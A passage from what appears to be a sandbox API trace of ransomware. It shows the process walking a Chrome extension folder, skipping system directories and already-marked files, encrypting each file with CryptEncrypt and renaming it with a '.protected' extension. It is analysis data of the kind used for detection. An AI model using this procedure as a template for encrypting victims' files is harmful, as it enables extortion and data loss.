lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0xd47, lpOverlapped=0x0) returned 1 [0079.971] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.971] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0079.971] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0079.971] CloseHandle (hObject=0x160) returned 1 [0079.972] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png.protected") returned 152 [0079.972] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_128.png.protected")) returned 1 [0079.975] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0079.975] lstrcmpiW (lpString1="icon_16.png", lpString2="Windows") returned -1 [0079.975] lstrcmpiW (lpString1="icon_16.png", lpString2="Program Files") returned -1 [0079.975] lstrcmpiW (lpString1="icon_16.png", lpString2="Program Files (x86)") returned -1 [0079.975] lstrcmpiW (lpString1="icon_16.png", lpString2="$Recycle.bin") returned 1 [0079.975] lstrcmpiW (lpString1="icon_16.png", lpString2="System Volume Information") returned -1 [0079.975] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png") returned 141 [0079.975] StrStrIW (lpFirst="icon_16.png", lpSrch=".protected") returned 0x0 [0079.975] lstrcmpW (lpString1="icon_16.png", lpString2="RESTORE_FILES.txt") returned -1 [0079.975] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0079.975] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0079.975] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0079.976] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png") returned 141 [0079.976] StrStrW (lpFirst="icon_16.png", lpSrch=".txt") returned 0x0 [0079.976] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png") returned 141 [0079.976] StrStrW (lpFirst="icon_16.png", lpSrch=".rar") returned 0x0 [0079.976] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png") returned 141 [0079.976] StrStrW (lpFirst="icon_16.png", lpSrch=".zip") returned 0x0 [0079.976] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x9d, lpOverlapped=0x0) returned 1 [0079.977] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffff63, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.977] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x9d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x9d, lpOverlapped=0x0) returned 1 [0079.977] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.977] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0079.977] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0079.977] CloseHandle (hObject=0x160) returned 1 [0079.977] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png.protected") returned 151 [0079.977] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\icon_16.png.protected")) returned 1 [0079.978] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0079.978] lstrcmpiW (lpString1="main.html", lpString2="Windows") returned -1 [0079.978] lstrcmpiW (lpString1="main.html", lpString2="Program Files") returned -1 [0079.978] lstrcmpiW (lpString1="main.html", lpString2="Program Files (x86)") returned -1 [0079.978] lstrcmpiW (lpString1="main.html", lpString2="$Recycle.bin") returned 1 [0079.978] lstrcmpiW (lpString1="main.html", lpString2="System Volume Information") returned -1 [0079.978] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html") returned 139 [0079.978] StrStrIW (lpFirst="main.html", lpSrch=".protected") returned 0x0 [0079.978] lstrcmpW (lpString1="main.html", lpString2="RESTORE_FILES.txt") returned -1 [0079.978] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0079.978] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0079.978] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0079.978] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html") returned 139 [0079.978] StrStrW (lpFirst="main.html", lpSrch=".txt") returned 0x0 [0079.978] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html") returned 139 [0079.978] StrStrW (lpFirst="main.html", lpSrch=".rar") returned 0x0 [0079.978] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html") returned 139 [0079.978] StrStrW (lpFirst="main.html", lpSrch=".zip") returned 0x0 [0079.978] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x5c, lpOverlapped=0x0) returned 1 [0079.979] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffffa4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.979] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x5c, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x5c, lpOverlapped=0x0) returned 1 [0079.979] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.979] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0079.979] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0079.979] CloseHandle (hObject=0x160) returned 1 [0079.979] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html.protected") returned 149 [0079.979] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.html.protected")) returned 1 [0079.980] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0079.980] lstrcmpiW (lpString1="main.js", lpString2="Windows") returned -1 [0079.980] lstrcmpiW (lpString1="main.js", lpString2="Program Files") returned -1 [0079.980] lstrcmpiW (lpString1="main.js", lpString2="Program Files (x86)") returned -1 [0079.980] lstrcmpiW (lpString1="main.js", lpString2="$Recycle.bin") returned 1 [0079.980] lstrcmpiW (lpString1="main.js", lpString2="System Volume Information") returned -1 [0079.980] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js") returned 137 [0079.980] StrStrIW (lpFirst="main.js", lpSrch=".protected") returned 0x0 [0079.980] lstrcmpW (lpString1="main.js", lpString2="RESTORE_FILES.txt") returned -1 [0079.980] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0079.980] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0079.980] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0079.981] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js") returned 137 [0079.981] StrStrW (lpFirst="main.js", lpSrch=".txt") returned 0x0 [0079.981] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js") returned 137 [0079.981] StrStrW (lpFirst="main.js", lpSrch=".rar") returned 0x0 [0079.981] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js") returned 137 [0079.981] StrStrW (lpFirst="main.js", lpSrch=".zip") returned 0x0 [0079.981] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x5f, lpOverlapped=0x0) returned 1 [0079.981] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xffffffa1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.981] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x5f, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x5f, lpOverlapped=0x0) returned 1 [0079.981] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.982] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0079.982] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0079.982] CloseHandle (hObject=0x160) returned 1 [0079.982] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js.protected") returned 147 [0079.982] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\main.js.protected")) returned 1 [0079.982] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0079.982] lstrcmpiW (lpString1="manifest.json", lpString2="Windows") returned -1 [0079.982] lstrcmpiW (lpString1="manifest.json", lpString2="Program Files") returned -1 [0079.982] lstrcmpiW (lpString1="manifest.json", lpString2="Program Files (x86)") returned -1 [0079.982] lstrcmpiW (lpString1="manifest.json", lpString2="$Recycle.bin") returned 1 [0079.982] lstrcmpiW (lpString1="manifest.json", lpString2="System Volume Information") returned -1 [0079.982] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json") returned 143 [0079.982] StrStrIW (lpFirst="manifest.json", lpSrch=".protected") returned 0x0 [0079.982] lstrcmpW (lpString1="manifest.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.982] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ddac | out: pbBuffer=0x295ddac) returned 1 [0079.982] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ddd4*=0x30) returned 1 [0079.983] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0079.983] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json") returned 143 [0079.983] StrStrW (lpFirst="manifest.json", lpSrch=".txt") returned 0x0 [0079.983] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json") returned 143 [0079.983] StrStrW (lpFirst="manifest.json", lpSrch=".rar") returned 0x0 [0079.983] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json") returned 143 [0079.983] StrStrW (lpFirst="manifest.json", lpSrch=".zip") returned 0x0 [0079.983] ReadFile (in: hFile=0x160, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ddf4*=0x2d6, lpOverlapped=0x0) returned 1 [0079.993] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0xfffffd2a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.993] WriteFile (in: hFile=0x160, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2d6, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ddf4*=0x2d6, lpOverlapped=0x0) returned 1 [0079.993] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.993] WriteFile (in: hFile=0x160, lpBuffer=0x295ddcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x295ddcc*, lpNumberOfBytesWritten=0x295ddf4*=0x4, lpOverlapped=0x0) returned 1 [0079.993] WriteFile (in: hFile=0x160, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ddf4*=0x30, lpOverlapped=0x0) returned 1 [0079.993] CloseHandle (hObject=0x160) returned 1 [0079.993] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json.protected") returned 153 [0079.993] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json.protected")) returned 1 [0079.994] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0079.994] lstrcmpiW (lpString1="_locales", lpString2="Windows") returned -1 [0079.994] lstrcmpiW (lpString1="_locales", lpString2="Program Files") returned -1 [0079.994] lstrcmpiW (lpString1="_locales", lpString2="Program Files (x86)") returned -1 [0079.994] lstrcmpiW (lpString1="_locales", lpString2="$Recycle.bin") returned 1 [0079.994] lstrcmpiW (lpString1="_locales", lpString2="System Volume Information") returned -1 [0079.994] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales") returned 138 [0079.994] lstrcmpW (lpString1="_locales", lpString2=".") returned 1 [0079.994] lstrcmpW (lpString1="_locales", lpString2="..") returned 1 [0079.994] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\*") returned 140 [0079.994] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\*", lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0x47bbd0 [0079.995] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.995] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.995] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.995] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.996] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.996] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\.") returned 140 [0079.996] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.996] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.996] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.996] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.996] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.996] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.996] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.996] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\..") returned 141 [0079.996] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.996] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.996] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.996] lstrcmpiW (lpString1="ar", lpString2="Windows") returned -1 [0079.996] lstrcmpiW (lpString1="ar", lpString2="Program Files") returned -1 [0079.996] lstrcmpiW (lpString1="ar", lpString2="Program Files (x86)") returned -1 [0079.996] lstrcmpiW (lpString1="ar", 